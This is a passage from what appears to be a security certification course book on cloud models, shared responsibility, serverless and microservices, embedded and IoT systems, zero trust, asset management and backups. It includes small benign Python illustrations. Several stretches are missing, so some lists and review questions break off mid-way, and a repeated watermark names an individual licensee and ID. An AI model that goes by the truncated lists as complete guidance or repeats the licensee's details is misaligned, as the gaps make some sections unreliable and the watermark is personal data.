infrastructures constitutes a hybrid cloud. In a hybrid cloud, companies can store
data in a private cloud but also leverage the resources of a public cloud when
needed. This allows for greater flexibility and scalability, as well as cost savings. A
hybrid cloud is commonly used because it enables companies to take advantage
of the benefits of both private and public clouds. Private clouds can provide
greater security and control over data, while public clouds offer more cost-effective
scalability and access to a broader range of resources. A hybrid cloud also allows
for a smoother transition to the cloud for companies that may need more time to
migrate all of their data.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Software as a Service
Software as a service (SaaS) is a model of provisioning software applications.
Rather than purchasing software licenses for a given number of seats, a business
accesses software hosted on a supplier’s servers on a pay-as-you-go or lease
arrangement (on-demand). The virtual infrastructure allows developers to provision
on-demand applications much more quickly than previously. The applications
are developed and tested in the cloud without the need to test and deploy on
client computers. Examples include Microsoft Office 365 (microsoft.com/en-us/
microsoft-365/enterprise), Salesforce (salesforce.com), and Google G Suite (gsuite.
google.com).
Platform as a Service
Platform as a service (PaaS) provides resources somewhere between SaaS
and IaaS. A typical PaaS solution would provide servers and storage network
infrastructure (as per IaaS) but also provide a multi-tier web application/database
platform on top. This platform could be based on Oracle and MS SQL or PHP and
MySQL. Examples include Oracle Database (oracle.com/database), Microsoft Azure
SQL Database (azure.microsoft.com/services/sql-database), and Google App Engine
(cloud.google.com/appengine).
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Distinct from SaaS, this platform would not be configured to do anything. Your
developers would create the software (the CRM or e‑commerce application) that
runs using the platform. The service provider would be responsible for the integrity
and availability of the platform components, and you would be responsible for the
security of the application you created on the platform.
Infrastructure as a Service
Infrastructure as a service (IaaS) is a means of provisioning IT resources such
as servers, load balancers, and storage area network (SAN) components quickly.
Rather than purchase these components and the Internet links they require, you
rent them as needed from the service provider’s datacenter. Examples include
Amazon Elastic Compute Cloud (aws.amazon.com/ec2), Microsoft Azure Virtual
Machines (azure.microsoft.com/services/virtual-machines), Oracle Cloud (oracle.
com/cloud), and OpenStack (openstack.org).
Third-Party Vendors
Third-party vendors are external entities that provide organizations with goods,
services, or technology solutions. In cloud computing, third-party vendors refer to
the providers offering cloud services to businesses using infrastructure-, platform-,
or software-as-a-service models. When engaging a third party, careful consideration of
cloud service provider selection, contract negotiation, service performance,
compliance, and communication practices is paramount. Organizations must adopt
robust vendor management strategies to mitigate cloud platform risks, ensure
service quality, and optimize cloud deployments. Service-level agreements (SLAs)
are contractual agreements between organizations and cloud service providers that
outline the expected levels of service delivery. SLAs define metrics, such as uptime,
performance, and support response times, along with penalties or remedies if
service levels are not met. SLAs provide a framework to hold vendors accountable
for delivering services at required performance levels.
Organizations must assess the security practices implemented by vendors to
protect their sensitive data, including data encryption, access controls, vulnerability
management, incident response procedures, and regulatory compliance, and are
responsible for ensuring compliance with data privacy requirements, especially
if they handle personally identifiable information (PII) or operate in regulated
industries. Vendor lock-in makes switching to alternative vendors or platforms
challenging or impossible, and so organizations must carefully evaluate data
portability, interoperability, and standardization to mitigate vendor lock-in risks.
Strategies like multi-cloud or hybrid cloud deployments can provide flexibility and
reduce reliance on a single vendor.
Responsibility Matrix
When using cloud infrastructure, security risks are not transferred but shared
between the cloud provider and the customer. The cloud provider is responsible
for securing the underlying infrastructure while the customer is responsible for
securing their applications and data. Choosing a cloud provider that offers robust
security features such as encryption, access controls, and network security is
important.
The shared responsibility model describes the balance of responsibility between a
customer and a cloud service provider (CSP) for implementing security in a cloud
platform. The division of responsibility becomes more or less complicated based on
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
whether the service model is SaaS, PaaS, or IaaS. For example, in a SaaS model, the
CSP performs the operating system configuration and control as part of the service
offering. In contrast, operating system security is shared between the CSP and the
customer in an IaaS model. A responsibility matrix sets out these duties in a
clear, tabular format:
Responsibility model
Identifying the boundary between customer and cloud provider responsibilities, in terms
of security, is imperative for reducing the risk of introducing vulnerabilities into your
environment.
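A simplified responsibility matrix can be modeled as a lookup table. The assignments below are a common illustrative division consistent with the text (for example, operating system security shared in IaaS but handled by the CSP in SaaS); real CSP matrices differ in detail:

```python
# Illustrative shared responsibility matrix (simplified; real CSP matrices differ)
MATRIX = {
    #  layer:            (IaaS,       PaaS,       SaaS)
    "physical":          ("csp",      "csp",      "csp"),
    "virtualization":    ("csp",      "csp",      "csp"),
    "operating_system":  ("shared",   "csp",      "csp"),
    "applications":      ("customer", "shared",   "csp"),
    "data":              ("customer", "customer", "customer"),
}
MODELS = ("iaas", "paas", "saas")

def who_secures(layer: str, model: str) -> str:
    """Return which party secures a given layer under a given service model."""
    return MATRIX[layer][MODELS.index(model)]

print(who_secures("operating_system", "saas"))  # csp
print(who_secures("data", "iaas"))              # customer
```

Note that data remains the customer's responsibility in every service model.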
In general terms, the responsibilities of the customer and the cloud provider
include the following areas:
Cloud Service Provider
• Physical security of the infrastructure
• Configuring the geographic location for storing data and running services
Replication
Data replication allows businesses to copy data to where it can be utilized
most effectively. The cloud may be used as a central storage area, making
data available among all business units. Data replication requires low latency
network connections, security, and data integrity. CSPs offer several data storage
performance tiers (cloud.google.com/storage/docs/storage-classes). The terms
“hot storage” and “cold storage” refer to how quickly data is retrieved. Hot storage
retrieves data more quickly than cold, but the quicker the data retrieval, the higher
the cost.
Different applications have diverse replication requirements. A database generally
needs low-latency, synchronous replication, as a transaction often cannot be
considered complete until it has been made on all replicas. A mechanism to
replicate data files to backup storage might not have such high requirements,
depending on the criticality of the data.
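The hot/cold tradeoff described above can be expressed as a simple tier-selection rule. The tier names echo common CSP offerings, but the access-frequency thresholds here are invented for illustration:

```python
def choose_storage_tier(accesses_per_month: int) -> str:
    """Pick a storage class by access frequency (illustrative thresholds)."""
    if accesses_per_month >= 30:
        return "hot"    # fastest retrieval, highest storage cost
    if accesses_per_month >= 1:
        return "cool"   # intermediate tier
    return "cold"       # cheapest storage, slowest/most costly retrieval

print(choose_storage_tier(100))  # hot
print(choose_storage_tier(5))    # cool
print(choose_storage_tier(0))    # cold
```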
Cloud Architecture
Serverless Computing
Serverless computing is a cloud computing model in which the cloud provider
manages the infrastructure and automatically allocates resources as needed,
charging only for the actual usage of the application. In this approach, organizations
do not need to manage servers and other infrastructure, allowing them to focus on
developing and deploying applications.
Some examples of serverless computing applications include chatbots, which
simulate conversations with human users to automate customer support, sales,
and marketing tasks; mobile backends, which comprise the server-side components
of mobile applications and provide data processing, storage, and communication
services; and event-driven processing, which responds in real time to triggers
such as sensor readings, alerts, or other similar events. Major
cloud providers like Amazon Web Services (AWS), Microsoft Azure, and Google
Cloud offer serverless computing capabilities, making it easier for organizations to
leverage this technology. Serverless computing provides a scalable, cost-effective,
and easy-to-manage infrastructure for event-driven and data-processing tasks.
With serverless, all the architecture is hosted within a cloud, but unlike “traditional”
virtual private cloud (VPC) offerings, services such as authentication, web
applications, and communications aren’t developed and managed as applications
running on VM instances within the cloud. Instead, the applications are developed
as functions and microservices, each interacting with other functions to facilitate
client requests. Billing is based on execution time rather than hourly charges.
Examples of this type of service include AWS Lambda (aws.amazon.com/lambda),
Google Cloud Functions (cloud.google.com/functions), and Microsoft Azure
Functions (azure.microsoft.com/services/functions).
Serverless platforms eliminate the need to manage physical or virtual server
instances, so there is little to no management effort for software and patches,
administration privileges, or file system security monitoring. There is no
requirement to provision multiple servers for redundancy or load balancing. As all
of the processing is taking place within the cloud, there is little emphasis on the
provision of a corporate network. The service provider manages this underlying
architecture. The principal network security job is to ensure that the clients
accessing the services have not been compromised.
Serverless architecture depends heavily on event-driven orchestration to facilitate
operations. For example, multiple services are triggered when a client connects
to an application. The application needs to authenticate the user and device,
identify the location of the device and its address properties, create a session,
load authorizations for the action, use application logic to process the action,
read or commit information from a database, and log the transaction. This
design logic differs from applications written in a “monolithic” server-based
environment.
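The event-driven orchestration described above can be sketched as a single function invoked per event, in the spirit of a serverless handler. The event fields and the `user_permissions` lookup are hypothetical; a real platform such as AWS Lambda supplies its own event and context objects:

```python
import json

def user_permissions(user):
    # Stand-in for a policy lookup against an identity service (hypothetical data)
    return {"alice": {"read", "write"}, "bob": {"read"}}.get(user, set())

def handler(event, context=None):
    """Hypothetical event-driven function: authenticate, authorize, then act."""
    user = event.get("user")
    if not user or not event.get("token_valid"):           # authenticate user/device
        return {"statusCode": 401, "body": json.dumps({"error": "unauthenticated"})}
    if event.get("action") not in user_permissions(user):  # load authorizations
        return {"statusCode": 403, "body": json.dumps({"error": "forbidden"})}
    result = {"user": user, "action": event["action"], "logged": True}  # process + log
    return {"statusCode": 200, "body": json.dumps(result)}

print(handler({"user": "bob", "token_valid": True, "action": "read"})["statusCode"])   # 200
print(handler({"user": "bob", "token_valid": True, "action": "write"})["statusCode"])  # 403
```

Billing in a real platform would cover only the milliseconds this function executes, rather than an always-on server.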
Microservices
Microservices is an architectural approach to building software applications as
a collection of small and independent services focusing on a specific business
capability. Each microservice is designed to be modular, with a well-defined
interface and a single responsibility. This approach allows developers to build and
deploy complex applications more efficiently by breaking them down into smaller,
more manageable components.
Microservices also enable teams to work independently on different application
features, making it easier to scale and update individual components without
affecting the entire system. Overall, microservices promise to help organizations
build more agile, scalable, and resilient applications that adapt quickly to changing
business needs. Risks associated with this model are largely attributed to
integration issues. While individual components operate well independently,
they often reveal problems difficult to isolate and resolve once they are
integrated.
Microservices and Infrastructure as Code (IaC) are related technologies, and
microservices architecture is often implemented using IaC practices. Using IaC,
developers can define and deploy infrastructure as code, ensuring consistency
and repeatability across different environments. This allows for more efficient
development and deployment of microservices, since developers can independently
automate the provisioning and deployment of infrastructure for each microservice.
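The core idea of IaC, declaring desired infrastructure as data and converging toward it, can be sketched in a provider-neutral way. Real IaC tools such as Terraform or AWS CloudFormation use their own declarative languages; this Python sketch only mimics the plan/apply pattern:

```python
# Desired state declared as data (the essence of infrastructure as code)
desired = {
    "web-1": {"type": "vm", "size": "small"},
    "web-2": {"type": "vm", "size": "small"},
}

def plan(current: dict, desired: dict) -> dict:
    """Compute the changes needed to converge current state to desired state."""
    return {
        "create": sorted(set(desired) - set(current)),
        "destroy": sorted(set(current) - set(desired)),
        "unchanged": sorted(set(current) & set(desired)),
    }

current = {"web-1": {"type": "vm", "size": "small"}}
print(plan(current, desired))  # create web-2, destroy nothing, keep web-1
```

Because the definition is code, the same plan can be replayed in every environment, which is what gives IaC its consistency and repeatability.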
Transformational Changes
Cloud computing offers many unique architectural services that differ from
traditional on-premises services. Cloud-native services allow organizations to
scale, innovate, and optimize their operations like never before. Important cloud
architectural services include offerings like elastic compute and auto-scaling, which
enable dynamic shifts in computing power in response to demand fluctuations.
Other services, such as serverless computing, significantly change application
development practices by abstracting traditional server resources.
Additionally, cloud platforms provide advanced content delivery networks (CDN)
that optimize web traffic by caching content, and object storage provides massive,
unstructured data storage services that often replace traditional file servers.
Identity and access management tools provide advanced security features and
enable new methods of platform integration, while containerization and container
orchestration tools are changing how applications are deployed and managed. AI
and machine learning services, serverless databases, backend IoT services, and big
data analytics capabilities further expand the range of possibilities for organizations
utilizing the cloud. These cloud architectural services provide unprecedented
potential to large and small organizations. However, while these services are
undoubtedly driving transformative innovation, the rate of change and unfamiliar
risks present in cloud platforms fuel significant new security issues and record-
breaking data breaches.
Responsiveness
Load balancing, edge computing, and auto-scaling are critical mechanisms to
ensure responsiveness, improve performance, and effectively handle fluctuating
workloads.
• Load Balancing—Distributes network traffic across multiple servers or services
to improve performance and provide high availability. In the cloud, load
balancers are intermediaries (proxies) between users and back-end resources
like virtual machines or containers. They distribute incoming requests to
different resources using sophisticated algorithms and handle server capacity,
response time, and workload.
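A minimal round-robin rotation, one of the simplest of the distribution algorithms mentioned, might look like the following. The server names are placeholders:

```python
import itertools

class RoundRobinBalancer:
    """Distribute incoming requests across back-end targets in rotation."""

    def __init__(self, targets):
        self._cycle = itertools.cycle(targets)

    def route(self, request_id):
        # Each request is handed to the next target in the rotation
        target = next(self._cycle)
        return (request_id, target)

lb = RoundRobinBalancer(["vm-a", "vm-b", "vm-c"])
for i in range(4):
    print(lb.route(i))  # requests cycle: vm-a, vm-b, vm-c, vm-a
```

Production load balancers layer health checks, weighting, and session affinity on top of a rotation like this.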
Considerations
Cost—Cloud adoption decisions should focus on solutions that best achieve
operational goals while maintaining the confidentiality, integrity, and availability
of data, not simply on cost. There are several cost models associated with running services
in the cloud, such as consumption-based or subscription-based, and most cloud
providers have tools designed to help estimate costs for migrating existing
workloads from on-premises to cloud. Using cloud services involves a shift from
capital expenses (CapEx) to operational expenses (OpEx). CapEx includes up-front
costs for purchasing hardware, software licenses, and infrastructure setup in
traditional on-premises IT infrastructure.
In contrast, cloud services are typically paid on a pay-as-you-go basis, allowing
organizations to convert CapEx into OpEx. Cloud services charge for usage and
resource consumption, eliminating the need for significant up-front investments.
This OpEx model provides flexibility, scalability, and cost optimization as
organizations pay only for the resources they use, making cloud services more cost-
effective from the viewpoint that they align expenses with actual usage. However,
resources not optimized to run on cloud infrastructure can present significant
challenges to the benefits this model advertises and generate overbearing recurring
costs.
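The CapEx-versus-OpEx comparison can be made concrete with a back-of-the-envelope calculation. All of the dollar figures below are invented for illustration:

```python
def capex_total(upfront: float, years: int, annual_maintenance: float) -> float:
    """On-premises: large up-front purchase plus yearly maintenance."""
    return upfront + years * annual_maintenance

def opex_total(monthly_usage_cost: float, years: int) -> float:
    """Cloud pay-as-you-go: recurring charges aligned with actual usage."""
    return monthly_usage_cost * 12 * years

# Hypothetical 3-year comparison
print(capex_total(upfront=120_000, years=3, annual_maintenance=10_000))  # 150000.0
print(opex_total(monthly_usage_cost=3_500, years=3))                     # 126000.0
```

The comparison cuts the other way if workloads are poorly optimized for the cloud: a high recurring monthly cost can quickly exceed the equivalent CapEx outlay, which is the risk the paragraph above warns about.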
Scalability—is one of the most valuable and compelling features of cloud
computing. It is the ability to dynamically expand and contract capacity in response
to demand with no downtime. There are two basic ways in which services can be
scaled. Scale-up (vertical scaling) describes adding capacity to an existing resource,
such as a processor, memory, and storage capacity. Scale-out (horizontal scaling)
describes adding additional resources, such as more instances (or virtual machines)
to work in parallel and increase performance.
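The two scaling approaches can be contrasted in a small sketch. The CPU thresholds are arbitrary illustrations, not recommended values:

```python
def scale_out(instances: int, cpu_pct: float, high=80.0, low=20.0) -> int:
    """Horizontal scaling: add or remove instances based on average CPU load."""
    if cpu_pct > high:
        return instances + 1   # add an instance to work in parallel
    if cpu_pct < low and instances > 1:
        return instances - 1   # contract capacity when demand drops
    return instances

def scale_up(vcpus: int, cpu_pct: float, high=80.0) -> int:
    """Vertical scaling: grow an existing instance's resources instead."""
    return vcpus * 2 if cpu_pct > high else vcpus

print(scale_out(instances=3, cpu_pct=92.0))  # 4 (scale out)
print(scale_up(vcpus=4, cpu_pct=92.0))       # 8 (scale up)
```

Cloud auto-scaling services apply rules like `scale_out` continuously and with no downtime, which is what makes elasticity practical.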
Resilience—Cloud providers use redundant hardware, fault tolerance
capabilities (such as clustering), and data replication to store data across multiple
servers and datacenters, ensuring that data remains available if one server or
datacenter fails.
Ease of deployment—Cloud features supporting ease of deployment include
automation, standardization, and portability.
• Automating the deployment and management of cloud resources reduces
the need for manual intervention and is often achieved using configuration
management, container orchestration, and infrastructure as code.
• Portability ensures that applications and services can be easily moved between
different cloud infrastructures, avoiding vendor lock-in and providing greater
flexibility.
SLA and ISA—Service level agreements (SLAs) define expected service levels,
including performance, availability, and support commitments between cloud
service providers and organizations. It is essential to carefully review and negotiate
SLAs to ensure they align with business requirements and adequately protect the
organization’s interests. Interconnection Security Agreements (ISAs) establish the
security requirements and responsibilities between the organization and the cloud
service provider to safeguard sensitive data and ensure compliance with industry
regulations to help ensure the confidentiality, integrity, and availability of data and
systems within the cloud environment. ISAs help ensure data and system protection
within the cloud environment and define encryption methods, access controls,
vulnerability management, and data segregation techniques. The agreement
must also specify data ownership, audit rights, and data backup, recovery, and
retention procedures. Regulated industries must ensure that their cloud service
provider complies with relevant regulations, such as GDPR, HIPAA, or PCI DSS, and
the ISA must detail how the provider meets these compliance requirements and
include provisions for auditing and reporting to demonstrate ongoing compliance.
Additionally, the ISA should address the use of subcontractors and clearly define
the security responsibilities and requirements for their selection and the process
for notifying the organization of subcontractor changes.
Disaster recovery planning is still essential and should include procedures for restoring
critical systems, data, and applications and communicating with customers and other
stakeholders. Additionally, testing and validation, service-level agreements, and incident
response procedures must all be carefully considered when evaluating the ease of
recovery of cloud infrastructure.
Review Activity:
Cloud Infrastructure
4. What is IaC?
Topic 6B
Embedded Systems and Zero Trust
Architecture
Embedded Systems
Embedded systems are used in various specialized applications, including
consumer electronics, industrial automation, automotive systems, medical devices,
and more. Some examples include the following:
• Home appliances—Such as refrigerators, washing machines, and coffee
makers, contain embedded systems that control their functions and operations.
Examples of RTOS
The VxWorks operating system is commonly used in aerospace and defense
systems. VxWorks provides real-time performance and reliability and is therefore
well suited for use in aircraft control systems, missile guidance systems, and other
critical defense systems. Another example of an RTOS is FreeRTOS, an open-source
operating system used in many embedded systems, such as robotics, industrial
automation, and consumer electronics.
In the automotive industry, RTOS is used in engine control, transmission control,
and active safety systems applications. For example, the AUTOSAR (Automotive
Open System Architecture) standard defines a framework for developing
automotive software, including using RTOS for certain applications. In medical
devices, RTOS is used for applications such as patient monitoring systems, medical
imaging, and automated drug delivery systems.
In industrial control systems, RTOS is used for process control and factory
automation applications. For example, the Siemens SIMATIC WinCC Open
Architecture system uses an RTOS to provide real-time performance and reliability
for industrial automation applications.
ICS/SCADA Applications
These types of systems are used within many sectors of industry:
• Energy refers to power generation and distribution. More widely, utilities include
water/sewage and transportation networks.
• Industrial can refer specifically to mining and refining raw materials, involving
hazardous high heat and pressure furnaces, presses, centrifuges, pumps, and
so on.
• Logistics refers to moving things from where they were made or assembled to
where they need to be, either within a factory or for distribution to customers.
Embedded technology is used in the control of automated transport and lift
systems, plus sensors for component tracking.
ICS/SCADA was historically built without regard to IT security, though there is now
high awareness of the necessity of enforcing security controls to protect them,
especially when they operate in a networked environment.
ICS and SCADA systems control and monitor critical processes and operational
technologies, making them attractive targets for attackers. The consequences
of attacks range from widespread power outages and environmental damage
to economic losses and even loss of life. Malware, ransomware, unauthorized
access, and targeted attacks pose significant risks to ICS and SCADA systems, and
robust cybersecurity protections, including network segmentation, access controls,
intrusion detection systems, encryption, and continuous monitoring, are essential
to safeguarding these critical systems.
Internet of Things
The Internet of Things (IoT) refers to the network of physical devices, vehicles,
appliances, and other objects embedded with sensors, software, and connectivity,
enabling them to collect and exchange data.
Sensors are small devices designed to detect changes in the physical environment,
such as temperature, humidity, and motion. On the other hand, actuators can
perform actions based on data collected by sensors, such as turning on a light
or adjusting a thermostat. IoT devices communicate with each other and with
other (often public cloud-based) systems over the Internet to exchange data and
receive instructions. Cloud-based systems form an essential component of IoT
infrastructures as they provide the computational power needed to perform data
analytics on the large amounts of data generated by IoT devices.
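The sensor-to-actuator relationship described above can be sketched as a simple control loop. The setpoint, deadband, and command names are invented for illustration:

```python
def thermostat_decision(reading_c: float, setpoint_c: float = 21.0, band: float = 0.5) -> str:
    """Derive an actuator command from a temperature sensor reading."""
    if reading_c < setpoint_c - band:
        return "heat_on"    # actuator responds to sensed environment
    if reading_c > setpoint_c + band:
        return "heat_off"
    return "hold"           # within the deadband, do nothing

for temp in (19.0, 21.2, 23.0):
    print(temp, "->", thermostat_decision(temp))
# 19.0 -> heat_on, 21.2 -> hold, 23.0 -> heat_off
```

In a real IoT deployment, the readings would also be streamed to a cloud backend for the kind of large-scale analytics the paragraph describes.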
IoT Examples
There are many IoT devices and applications in use today. For example, smart
homes often use IoT sensors and actuators to control lighting, temperature,
and security systems, allowing homeowners to monitor and adjust their homes
remotely. Smart cities also use IoT to manage traffic, monitor air quality, and
improve public safety. In the healthcare industry, IoT devices such as wearables
and implantable devices can collect data on patient health and send it to
healthcare providers for analysis. In agriculture, IoT sensors are used to monitor
soil conditions, weather patterns, and crop growth, helping farmers make more
informed decisions about planting and harvesting. IoT devices are used to improve
efficiency, convenience, and quality of life in a wide range of industries and
applications.
IoT devices often have poor security characteristics for several reasons. IoT devices
are typically designed to focus on functionality rather than security and have
limited processing power and memory, making it difficult to implement strong
security controls. Many IoT devices must be low cost, making it challenging for
manufacturers to prioritize security features in their design and development
process. Many IoT devices are rushed to market without proper security testing,
resulting in vulnerabilities that cybercriminals can exploit.
Additionally, many consumers and organizations lack awareness of the security
risks associated with IoT devices. Many users and organizations do not realize that
their devices are vulnerable to cyberattacks and may not take the necessary steps
to protect themselves, such as changing default passwords or updating firmware.
Deperimeterization
Deperimeterization refers to a security approach that shifts the focus from
defending a network’s boundaries to protecting individual resources and data
within the network. As organizations adopt cloud computing, remote work,
and mobile devices, traditional perimeter-based security models become less
effective in addressing modern threats. Deperimeterization concepts advocate
for implementing multiple security measures around individual assets, such as
data, applications, and services. This approach includes robust authentication,
encryption, access control, and continuous monitoring to maintain the security
of critical resources, regardless of their location.
• Policy-driven access control describes how access control policies are used to
enforce access restrictions based on user identity, device posture, and network
context.
Device posture refers to the security status of a device, including its security
configurations, software versions, and patch levels. In a security context, device posture
assessment involves evaluating the security status of a device to determine whether it
meets certain security requirements or poses a risk to the network.
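Device posture assessment can be sketched as a rule check over reported device attributes. The policy values, attribute names, and rules below are hypothetical:

```python
from datetime import date

# Hypothetical posture policy: minimum OS version, recent patching, disk encryption
POLICY = {"min_os_version": (10, 2), "max_patch_age_days": 30, "require_encryption": True}

def assess_posture(device: dict, today: date) -> list:
    """Return a list of posture failures; an empty list means compliant."""
    failures = []
    if tuple(device["os_version"]) < POLICY["min_os_version"]:
        failures.append("os_outdated")
    if (today - device["last_patched"]).days > POLICY["max_patch_age_days"]:
        failures.append("patches_stale")
    if POLICY["require_encryption"] and not device["disk_encrypted"]:
        failures.append("disk_unencrypted")
    return failures

laptop = {"os_version": (10, 3), "last_patched": date(2024, 9, 20), "disk_encrypted": False}
print(assess_posture(laptop, today=date(2024, 10, 1)))  # ['disk_unencrypted']
```

In a policy-driven access control system, a non-empty failure list would typically cause the access request to be denied or the device quarantined.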
The control plane manages policies that dictate how users and devices are
authorized to access network resources. It is implemented through a centralized
policy decision point. The policy decision point is responsible for defining policies
that limit access to resources on a need-to-know basis, monitoring network
activity for suspicious behavior, and updating policies to reflect changing network
conditions and security threats. The policy decision point comprises two
subsystems:
• The policy engine is configured with subject and host identities and credentials,
access control policies, up-to-date threat intelligence, behavioral analytics,
and other results of host and network security scanning and monitoring. This
comprehensive state data allows it to define an algorithm and metrics for
making dynamic authentication and authorization decisions on a per-request
basis.
• The policy administrator establishes and removes the communication path
between a subject and a resource, based on the decisions made by the policy
engine.
Where systems in the control plane define policies and make decisions, systems
in the data plane establish sessions for secure information transfers. In the data
plane, a subject (user or service) uses a system (such as a client host PC, laptop,
or smartphone) to make requests for a given resource. A resource is typically an
enterprise app running on a server or cloud. Each request is mediated by a policy
enforcement point. The enforcement point might be implemented as a software
agent running on the client host that communicates with an app gateway. The
policy enforcement point interfaces with the policy administrator to set up a secure
data pathway if access is approved, or tear down a session if access is denied or
revoked.
The processes implementing the policy enforcement point are the only ones permitted to
interface with the policy administrator. It is critical to establish a root of trust for these
processes so that policy decisions cannot be tampered with.
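The decision flow between the policy decision point and the enforcement point can be sketched as follows. The signal names and the risk-score threshold are illustrative, not drawn from any specific zero trust product:

```python
def policy_engine_decision(request: dict) -> bool:
    """Dynamic per-request decision combining identity, posture, and analytics."""
    return (
        request["identity_verified"]            # authenticated subject
        and request["device_compliant"]         # device posture check passed
        and request["risk_score"] < 50          # behavioral analytics threshold
        and request["resource"] in request["entitlements"]  # need-to-know policy
    )

def policy_enforcement_point(request: dict) -> str:
    """Mediate the request: set up or deny the data pathway per the decision."""
    if policy_engine_decision(request):
        return f"session-established:{request['resource']}"
    return "access-denied"

req = {
    "identity_verified": True,
    "device_compliant": True,
    "risk_score": 12,
    "resource": "payroll-app",
    "entitlements": {"payroll-app", "mail"},
}
print(policy_enforcement_point(req))  # session-established:payroll-app
```

Because the decision is re-evaluated per request, a later rise in `risk_score` would cause the same subject's next request to be denied, which is the continuous-evaluation behavior zero trust requires.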
The data pathway established between the policy enforcement point and the
resource is referred to as an implicit trust zone. For example, the outcome of a
successful access request might be an IPsec tunnel established between a digitally
signed agent process running on the client, a trusted web application gateway, and
the resource server. Because the data is protected by IPsec transport encryption,
no tampering by anyone with access to the underlying network infrastructure
(switches, access points, routers, and firewalls) is possible.
The goal of zero trust design is to make this implicit trust zone as small as
possible, and as transient as possible. Trusted sessions might only be established
for individual transactions. This granular or microsegmented approach is in
contrast with perimeter-based models, where trust is assumed once a user has
authenticated and joined the network. In zero trust, place in the network is not a
sufficient reason to trust a subject request. Similarly, even if a user is nominally
authenticated, behavioral analytics might cause a request to be blocked or a
session to be terminated.
Separating the control plane and data plane is significant because it allows for
a more flexible and scalable network architecture. The centralized control plane
ensures consistency for access request handling across both the managed
enterprise network and unmanaged Internet or third-party networks, regardless
of the devices being used or the user’s location. This makes managing access
control policies and monitoring network activity for suspicious behavior easier.
Continuous monitoring via the independent control plane means that sessions can
be terminated if anomalous behavior is detected.
Review Activity:
Embedded System and Zero Trust
Architecture
of IoT devices?
Lesson 6
Summary
You should be able to summarize virtualization and cloud computing concepts and
understand common cloud security concepts related to compute, storage, and
network functions.
• If using a CSP, create an SLA and security responsibility matrix to identify who
will perform security-critical tasks. Ensure that reporting and monitoring of cloud
security data is integrated with on-premises monitoring and incident response.
• Evaluate the security features of embedded devices and isolate them from other
network devices.
LESSON INTRODUCTION
Asset management, security architecture resilience, and physical security are crucial
concepts that underpin effective cybersecurity operations. Asset management
involves identifying, tracking, and safeguarding an organization’s assets, ranging
from hardware and software to data and intellectual property. By knowing what
assets exist, where they are, and their value to the organization, cybersecurity
teams can prioritize their efforts to protect the most critical assets from cyber
threats.
Security architecture resilience refers to the design and implementation of systems
and networks in a way that allows them to withstand and recover quickly from
disruptions or attacks. This includes redundancy, fail-safe mechanisms, and robust
incident response plans. By building resilience into the security architecture,
cybersecurity teams ensure that even if a breach occurs, the impact is minimized,
and normal operations can be restored quickly.
Physical security protects personnel, hardware, software, networks, and data
from physical actions and events that could cause severe damage or loss to an
organization. This includes controls like access badges, CCTV systems, and locks,
as well as sensors for intrusion detection. Physical security is a critical aspect of
cybersecurity, as a breach in physical security can lead to direct access to systems
and data, bypassing other cybersecurity measures.
Together, these concepts support cybersecurity operations, help protect against
a wide range of problems, and ensure the continuity of operations in the face of
disruptive events.
Lesson Objectives
In this lesson, you will do the following:
• Review important data backup concepts.
Topic 7A
Asset Management
Asset Tracking
An asset management process tracks all the organization’s critical systems,
components, devices, and other objects of value in an inventory. It also involves
collecting and analyzing information about these assets so that personnel can make
informed changes or work with assets to achieve business goals.
There are many software suites and associated hardware solutions available for
tracking and managing assets. An asset management database can store as much
or as little information as necessary. Typical data would be type, model, serial
number, asset ID, location, user(s), value, and service information.
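A minimal asset inventory record capturing the typical fields listed above might look like this. All of the values are fictitious:

```python
from dataclasses import dataclass

@dataclass
class Asset:
    """One record in an asset management database (illustrative fields)."""
    asset_id: str
    asset_type: str
    model: str
    serial_number: str
    location: str
    assigned_user: str
    value_usd: float

inventory = [
    Asset("A-0001", "laptop", "ThinkPad T14", "SN-998877", "HQ-2F", "jsmith", 1400.00),
    Asset("A-0002", "switch", "Catalyst 9300", "SN-112233", "DC-1", "netops", 6200.00),
]

def find_by_location(assets, location):
    """Simple inventory query: which assets are at a given site?"""
    return [a.asset_id for a in assets if a.location == location]

print(find_by_location(inventory, "HQ-2F"))  # ['A-0001']
```

A real asset management suite adds service history, lifecycle state, and links to the CMDB on top of records like these.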
Asset Acquisition/Procurement
From the perspective of supporting cybersecurity operations, asset acquisition/
procurement policies are critical in ensuring organizations maintain a robust
security posture. Key considerations include selecting hardware and software
solutions with strong security features, such as built-in encryption, secure boot
mechanisms, and regular updates or patches. It is crucial to work with reputable
vendors and manufacturers that prioritize security and provide ongoing support to
address potential vulnerabilities in their products.
using a standard naming convention. CIs are defined by their attributes and
relationships stored in a configuration management database (CMDB).
Diagrams are the best way to capture the complex relationships between network
elements. Diagrams illustrate the use of CIs in business workflows, logical (IP) and
physical network topologies, and network rack layouts.
Data Backups
Backups play an essential role in asset protection by ensuring the availability
and integrity of an organization’s critical data and systems. By creating copies of
important information and storing them securely in separate locations, backups are
a safety net in case of hardware failure, data corruption, or cyberattacks such as
ransomware. Regularly testing and verifying backup data is crucial to ensuring the
reliability of the recovery process.
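One simple form of backup verification is comparing a cryptographic hash of the restored copy against the original. This is a sketch of the integrity-check idea, not a full enterprise backup tool:

```python
import hashlib

def sha256_of(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def verify_restore(original: bytes, restored: bytes) -> bool:
    """A restore is only trustworthy if it is bit-for-bit identical."""
    return sha256_of(original) == sha256_of(restored)

original = b"critical customer records"
good_restore = b"critical customer records"
corrupt_restore = b"critical customer record"   # silent truncation

print(verify_restore(original, good_restore))     # True
print(verify_restore(original, corrupt_restore))  # False
```

Enterprise backup suites automate checks like this across every backup job, which is why regular recovery validation can catch corruption before a real disaster does.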
In an enterprise setting, simple backup techniques often prove insufficient to address
large organizations’ unique challenges and requirements. Scalability becomes a
critical concern when vast amounts of data need to be managed efficiently. Simple
backup methods may struggle to accommodate growth in data size and complexity.
Performance issues caused by simple backup techniques can disrupt business
operations because they slow down applications while running and typically have
lengthy recovery times. Additionally, enterprises demand greater granularity and
customization to target specific applications, databases, or data subsets, which
simple techniques often fail to provide.
Compliance and security requirements necessitate advanced features such as
data encryption, access control, and audit trails that simplistic approaches typically
lack. Moreover, robust disaster recovery plans and centralized management are
essential components of an enterprise backup strategy. Simple backup techniques
might not support advanced features like off-site replication, automated failover,
or streamlined management of the diverse systems and geographic locations that
comprise a modern organization’s information technology environment.
